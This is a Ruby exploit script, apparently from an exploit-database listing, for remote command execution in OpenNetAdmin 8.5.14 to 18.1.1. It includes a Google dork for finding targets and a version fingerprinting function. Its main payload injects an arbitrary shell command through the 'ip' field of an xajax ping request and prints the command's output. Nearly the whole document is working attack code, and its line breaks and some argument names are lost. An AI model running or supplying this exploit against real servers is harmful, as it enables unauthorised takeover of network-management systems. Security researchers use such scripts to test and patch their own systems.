# OpenNetAdmin versions 8.5.14 through 18.1.1 遠程命令執行漏洞
#!/usr/bin/env ruby # Exploit ## Title: OpenNetAdmin 8.5.14 <= 18.1.1 - Remote Command Execution ## Google Dorks: ## inurl:/ona/ ## Author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr) ## Author website: https://pwn.by/noraj/ ## Date: 2021-05-07 ## Vendor Homepage: https://github.com/opennetadmin/ona ## Software Link: https://github.com/opennetadmin/ona/archive/refs/tags/v18.1.1.tar.gz ## Version: 8.5.14 to 18.1.1 ## Tested on: OpenNetAdmin 18.1.1 ## Patch: Use git master branch (no new version released) # Vulnerabilities ## Discoverer: mattpascoe ## Date: 2019-11-19 ## Discoverer website: https://github.com/mattpascoe ## Discovered on OpenNetAdmin 18.1.1 ## Vulnerability 1: ## Title: OpenNetAdmin 18.1.1 - Remote Code Execution ## CVE: none ## References: https://www.exploit-db.com/exploits/47691 require 'httpx' require 'docopt' doc = <<~DOCOPT OpenNetAdmin 8.5.14 <= 18.1.1 - Remote Command Execution Usage: #{__FILE__} exploit[--debug] #{__FILE__} version [--debug] #{__FILE__} -h | --help exploit: Exploit the RCE vuln version: Try to fetch OpenNetAdmin version Options: Root URL (base path) including HTTP scheme, port and root folder Command to execute on the target --debug Display arguments -h, --help Show this screen Examples: #{__FILE__} exploit http://example.org id #{__FILE__} exploit https://example.org:5000/ona 'touch hackproof' #{__FILE__} version https://example.org:5000/ona DOCOPT def exploit(root_url, cmd, separator) params = { 'xajax' => 'window_submit', 'xajaxargs' => ['tooltips', "ip=>; echo #{separator}; #{cmd} 2>&1; echo #{separator}", 'ping'] } res = HTTPX.post(root_url, form: params).body.to_s.match(/#{separator}(.*)#{separator}/m) return '[-] Target not vulnerable' if res.captures[0].nil? res.captures[0] end def version(root_url) params = { 'xajax' => 'window_open', 'xajaxargs' => ['app_about'] } res = HTTPX.post(root_url, form: params).body.to_s.match(/© \d{4} OpenNetAdmin - v(\S+)<\/u>/) return '[-] Version not found' if res.captures[0].nil? res.captures[0] end begin args = Docopt.docopt(doc) pp args if args['--debug'] if args['version'] puts version(args[' ']) else SEPARATOR = '556cc23863fef20fab5c456db166bc6e'.freeze output = exploit(args[' '], args[' '], SEPARATOR) puts '[+] Command output:' puts output end rescue Docopt::Exit => e puts e.message end
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